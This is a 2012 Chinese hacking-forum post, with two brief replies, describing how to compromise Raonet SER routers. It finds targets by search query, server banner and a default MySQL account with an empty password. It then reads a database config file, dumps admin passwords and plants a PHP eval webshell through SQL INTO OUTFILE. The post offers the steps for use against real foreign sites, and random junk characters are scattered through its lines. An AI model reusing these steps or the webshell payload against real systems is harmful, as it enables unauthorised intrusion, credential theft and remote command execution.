找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3077|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
6 K" r, O) {. a3 Y) A/ b9 U# A2 u3 R' z+ k
1:google搜索'Raonet Subscriber Ethernet Router'& @; |% g" ?# W5 L6 C- M

' Z+ E. V: C- q( |# t7 T6 D2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20011 g2 R* q; N6 r# ^1 ^; E

1 p% P/ U+ ^6 d+ h' q3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
5 M3 C% ?* Q3 n
9 ], r+ Y4 N% X- X) _, R3 M9 [7 E//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......: R& T" ~$ P; `# @2 R
( V: w! |, J9 Y! H; m
: a; Q. m2 u7 t9 p9 m) r0 v" I

' q; c# Y7 G0 A4 x入侵步骤:) m7 g- h- G( C. w9 o4 `6 y
% d  m8 {( V/ r9 R* R
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
  L$ M+ Y2 ?% U& v1 Q8 o% e
6 g3 e$ d- ^% x/ H9 p2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc0 H- `, m8 N9 Q8 ]
3:得到密码后连接,查看GUI管理密码:
8 L& T2 j7 H* K. o; l1 W9 T) ouse ser_500
3 f( n8 j1 e2 |. g. E" s8 V+ }; [8 Fselect id,passwd from user;7 m! @. h  ^5 P
4:通过数据库写入webshell,执行命令:/ x, g9 d7 L0 P. A- h% U' i  Z9 ]5 _
use mysql;
1 H) V9 W% Q& t' g* b. o# s% ocreate table ok(cmd TEXT);7 q6 [- c7 N: c: J$ B8 e( G9 n
insert into ok values("<?php @eval($_POST[cmd])?>");* i9 E: U/ V$ r% D, R8 u
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
/ W4 S8 Y8 R* \! \1 Q8 ^/ Ldrop table ok;
8 M1 Q7 t8 F- m" B! e' S$ \' R. D
5:连接后门shell.php
! p0 h1 ~( b8 A5 f& t  j$ o
  N9 w& q, g3 ~5 h6. 搞定!
9 N- D. [; V. E0 S) @6 x# W7 E( b& _# R3 L( X- F( D! L$ j
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表